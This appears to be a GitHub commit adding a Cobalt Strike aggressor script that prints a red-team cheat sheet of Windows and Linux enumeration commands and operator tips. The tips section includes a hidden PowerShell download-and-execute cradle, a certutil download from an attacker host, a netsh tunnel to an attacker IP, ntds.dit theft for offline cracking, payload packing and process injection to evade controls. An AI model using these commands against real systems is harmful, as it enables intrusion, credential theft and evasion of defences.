Red Team Repo

Execute-Assembly
Harley Lebeau 2017-09-04 05:23:45 -04:00 committed by GitHub
parent c9c4db2a90
commit 31f71d8fd4
1 changed files with 197 additions and 0 deletions

197
RedTeamRepo.cna Normal file
View File

@ -0,0 +1,197 @@
#RedTeamRepo
#Author: @r3dqu1nn
#A Common Repository for when you forget your RTFM and no googles.
#https://www.sock-raw.org/wiki/doku.php/start - @ithilgore
#http://pwnwiki.io/#!index.md
#https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
#This script will be continuously updated. Any input or feedback is welcomed!! Enjoy and happy hacking!
beacon_command_register("RedRepo", "A large repository of commands and red team tips",
"\nSyntax: RedRepo [Option]\n" .
"\nList Options: RedRepo [List]\n" .
"\nDisplays well known commands for an OS, or diplays great tips or tricks for a Red Team Operator.\n");
alias RedRepo {
if ($2 ismatch 'List') {
local('$out');
#blog($1, "\c0\n\nRepo Options\n============");
$out = "RedRepo Options\n";
$out .= " \c0===============\n\n";
$out .= " Option Description\n";
$out .= "\c0 ------ -----------\n";
blog($1, $out);
blog2($1, "\cBWindows Windows Enumeration Commands");
blog2($1, "\cBLinux Linux Enumeration Commands");
blog2($1, "\cBTips Red Team Tips");
blog2($1, "\cBList List of Options");
blog2($1, "\cBSmile Happy Hacking!\n");
}
if ($2 ismatch 'Windows') {
blog($1, "\t\c4====== Common Windows Commands ======\n");
#WMIC Commands
blog($1, "\t\c4====== WMIC Enumeration Commands ======\n");
blog2($1, "\t\cBwmic computersystem get Name,domain,NumberofProcessors,Roles,totalphysicalmemory");
blog2($1, "\t\cBwmic desktop get Name,ScreenSaverActive,Wallpaper");
blog2($1, "\t\cBwmic netlogin get Caption,Privileges,UserID,UserType,NumberOfLogons,PasswordAge,LogonServer,Workstations");
blog2($1, "\t\cBwmic process get CSName,Description,ExecutablePath,ProcessId");
blog2($1, "\t\cBwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName");
blog2($1, "\t\cBwmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace");
blog2($1, "\t\cBwmic netuse list full");
blog2($1, "\t\cBwmic startup get Caption,Command,Location,User");
blog2($1, "\t\cBwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version");
blog2($1, "\t\cBwmic qfe get HotFixID,InstalledOn");
blog2($1, "\t\cBwmic ntdomain list");
blog2($1, "\t\cBwmic bios [list full]\n");
blog($1, "\t\c4====== Info Harvesting ======\n");
#Host Enumeration
blog2($1, "\t\cBsysteminfo");
blog2($1, "\t\cBsysteminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"");
blog2($1, "\t\cBSET");
blog2($1, "\t\cBipconfig /all");
blog2($1, "\t\cBroute print");
blog2($1, "\t\cBarp -a");
blog2($1, "\t\cBnetstat -ano | findstr /I listening");
blog2($1, "\t\cBnetstat -ano | findstr /I established");
blog2($1, "\t\cBnbtstat -A *target IP*");
blog2($1, "\t\cBnslookup");
blog2($1, "\t\cBreg query [key]");
blog2($1, "\t\cBGet-ItemProperty [key] (PowerShell)");
blog2($1, "\t\cBschtasks /query /fo LIST /v");
blog2($1, "\t\cBsc query");
blog2($1, "\t\cBsc qc [service name]");
blog2($1, "\t\cBtasklist /SVC (/S Remote Computer)");
blog2($1, "\t\cBDRIVERQUERY");
blog2($1, "\t\cBRun C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config");
blog2($1, "\t\cBgpresult /z");
blog2($1, "\t\cBwhoami /all");
blog2($1, "\t\cBnetsh firewall show conf");
blog2($1, "\t\cBnetsh wlan show profiles");
blog2($1, "\t\cBnetsh advfirewall show allprofiles\n");
blog($1, "\t\c4======= Net Commands =======\n");
#Old School Net Commands
blog2($1, "\t\cBnet accounts [/domain]");
blog2($1, "\t\cBnet group \"groupname\" [/domain]");
blog2($1, "\t\cBnet localgroup \"groupname\" [/domain]");
blog2($1, "\t\cBnet view [/domain]");
blog2($1, "\t\cBnet session");
blog2($1, "\t\cBnet share");
blog2($1, "\t\cBnet user [/domain]");
blog2($1, "\t\cBnet user [username] [/domain]");
blog2($1, "\t\cBnet use * \\\\IP\\C$ /user:username [password]");
blog2($1, "\t\cBUse the built in net commands with Beacon! [help net]\n");
}
if ($2 ismatch 'Linux') {
blog($1, "\t\c4====== Common Linux Commands ======\n");
blog($1, "\t\c4====== Info Harvesting/Host/Network Enumeration ======\n")
blog2($1, "\t\cBcat /etc/issue");
blog2($1, "\t\cBcat /etc/*-release");
blog2($1, "\t\cBcat /etc/*-release | grep -E '\"NAME=\"|ID|VERSION|ID_LIKE'");
blog2($1, "\t\cBcat /proc/version");
blog2($1, "\t\cBrpm -q kernel");
blog2($1, "\t\cBdmesg | grep Linux");
blog2($1, "\t\cBls /boot | grep vmlinuz-");
blog2($1, "\t\cBlsb_release -a");
blog2($1, "\t\cBlast -a");
blog2($1, "\t\cBuname -a");
blog2($1, "\t\cBuname -mrs");
blog2($1, "\t\cBid");
blog2($1, "\t\cBhistory");
blog2($1, "\t\cBarp -a");
blog2($1, "\t\cBnetstat -anot");
blog2($1, "\t\cBps -elf");
blog2($1, "\t\cBps -elf | grep root");
blog2($1, "\t\cBls -la /var/www/html/");
blog2($1, "\t\cBservice apache2 status");
blog2($1, "\t\cBcat /etc/resolv.conf");
blog2($1, "\t\cBcat /etc/networks");
blog2($1, "\t\cBiptables -L");
blog2($1, "\t\cBiptables -L -t nat");
blog2($1, "\t\cBlsof -i");
blog2($1, "\t\cBcat /etc/services");
blog2($1, "\t\cBgrep 80 /etc/services");
blog2($1, "\t\cBw");
blog2($1, "\t\cBroute -n");
blog2($1, "\t\cBcat /etc/passwd");
blog2($1, "\t\cBcat /etc/passwd | awk -F : '{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}'");
blog2($1, "\t\cBcat /etc/motd");
blog2($1, "\t\cBcat /etc/group");
blog2($1, "\t\cBcat /etc/shadow\n");
}
if ($2 ismatch 'Tips') {
blog($1, "\t\c4====== Red Team Tips ======\n");
#Red Tips
blog2($1, "\t\cBhttps://github.com/vysec/RedTips (If you have InterWebs)");
blog2($1, "\t\cBhttps://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt (InterWebs Required)");
blog2($1, "\t\cBNeed a map of the network? Run Bloodhound!! https://github.com/BloodHoundAD/BloodHound");
blog2($1, "\t\cBAlways check sysvols!! Domain Controllers will have them, you'll be surprised how some are still viewable by normal users.");
blog2($1, "\t\cBnet user a specific user and see if they are executing any logon scripts, those might contain juicy information.");
blog2($1, "\t\cBAlways check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.");
blog2($1, "\t\cBFind those Fileservers! Sysadmins leave behind all kinds of goodies there.");
blog2($1, "\t\cBUse a Windows 7 workstation to tunnel your traffic natively. netsh int portproxy v4tov4 listenport=[port] connecthost=[AttackerIP] connectport=[port]");
blog2($1, "\t\cBUse certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.");
blog2($1, "\t\cBThe all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))\"");
blog2($1, "\t\cBUse tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.");
blog2($1, "\t\cBEnable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f");
blog2($1, "\t\cBPlease wrap/encode/pack your payloads if you have to drop to disk!");
blog2($1, "\t\cBTry to stay in memory and avoid putting files on disk.");
blog2($1, "\t\cBLive off the land!! Use what is on the target, native windows binaries are very powerful!");
blog2($1, "\t\cBUse AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.");
blog2($1, "\t\cBEnterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!");
blog2($1, "\t\cBInvoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.");
blog2($1, "\t\cBHave multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.");
blog2($1, "\t\cBcmd.exe and powershell.exe blocked by GPO? Find a process that's user owned and started on bootup for process injection to bypass that.");
blog2($1, "\t\cBJust because you acquired initial access doesn't mean you stop doing recon. Network/Host Enumeration is always the most important part.");
blog2($1, "\t\cBInvoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.");
blog2($1, "\t\cBNeed a Temporary web server? Use Python! python -m SimpleHTTPServer [port]\n");
}
if ($2 ismatch 'Smile') {
local('$smile');
$smile = "\n";
$smile .= "\t\c9░░░░░░░░░░░███████░░░░░░░░░░░\n";
$smile .= "\t\c9░░░░░░░████░░░░░░░████░░░░░░░\n";
$smile .= "\t\c9░░░░░██░░░░░░░░░░░░░░░██░░░░░\n";
$smile .= "\t\c9░░░██░░░░░░░░░░░░░░░░░░░██░░░\n";
$smile .= "\t\c9░░█░░░░░░░░░░░░░░░░░░░░░░░█░░\n";
$smile .= "\t\c9░█░░████░░░░░░░░██████░░░░░█░\n";
$smile .= "\t\c9█░░█░░░██░░░░░░█░░░░███░░░░░█\n";
$smile .= "\t\c9█░█░░░░░░█░░░░░█░░░░░░░█░░░░█\n";
$smile .= "\t\c9█░█████████░░░░█████████░░░░█\n";
$smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
$smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
$smile .= "\t\c9█░░░████████████████████░░░░█\n";
$smile .= "\t\c9░█░░░█▓▓▓▓▓▓▓▓█████▓▓▓█░░░░█░\n";
$smile .= "\t\c9░█░░░░█▓▓▓▓▓██░░░░██▓██░░░░█░\n";
$smile .= "\t\c9░░█░░░░██▓▓█░░░░░░░▒██░░░░█░░\n";
$smile .= "\t\c9░░░██░░░░██░░░░░░▒██░░░░██░░░\n";
$smile .= "\t\c9░░░░░██░░░░███████░░░░██░░░░░\n";
$smile .= "\t\c9░░░░░░░███░░░░░░░░░███░░░░░░░\n";
$smile .= "\t\c9░░░░░░░░░░█████████░░░░░░░░░░\n";
blog($1, $smile);
}
if ($2 is $null) {
berror($1, "\c4Need to specify additional syntax! Use the 'List' command for help");
blog($1, "\cBSyntax Example: CommandRepo Windows");
}
}